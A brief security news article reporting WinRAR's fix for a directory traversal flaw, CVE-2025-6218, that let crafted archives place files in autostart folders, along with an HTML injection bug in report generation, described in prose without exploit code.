Redazione RHC : 26 June 2025 19:19
WinRAR developers have fixed a Directory Traversal vulnerability, which has been assigned the identifier CVE-2025-6218. Under certain circumstances, this bug allowed malware to be executed after the archive was extracted.
The vulnerability received a score of 7.8 on the CVSS scale and was discovered by a researcher with the handle whs3-detonator, who reported the issue through the Zero Day Initiative in early June 2025. The issue only affects the Windows version of WinRAR, starting with version 7.11 and later, while the fix was introduced in WinRAR 7.12 beta 1, released this week.
“When extracting a file in older versions of WinRAR, RAR for Windows, UnRAR and UnRAR.dll, including the portable UnRAR source code, can use the path specified in a specially crafted archive, instead of the path specified by the user,” the developers explain.
In other words, a malicious archive can contain files with a modified relative path, which forces WinRAR to extract them to potentially dangerous locations, including system directories and autostart folders.
If the contents of such an archive are malicious, the extracted files can be executed automatically, causing malicious code to be executed the next time the user logs in to Windows. Even though such programs run with user-level rights and do not have administrator or SYSTEM privileges, they are still capable of stealing sensitive data, including browser cookies and saved passwords, establishing themselves on the victim’s system, or providing remote access to their operators.
In addition to CVE-2025-6218, an HTML injection issue was also fixed in WinRAR 7.12 beta 1, which occurred during report generation. This bug was reported by security researcher Marcin Bobryk (Marcin Bobryk). He explains that archive file names containing could be embedded in the HTML report as raw HTML tags. As a result, this could lead to HTML and JS injections if the reports were opened in a browser.
Redazione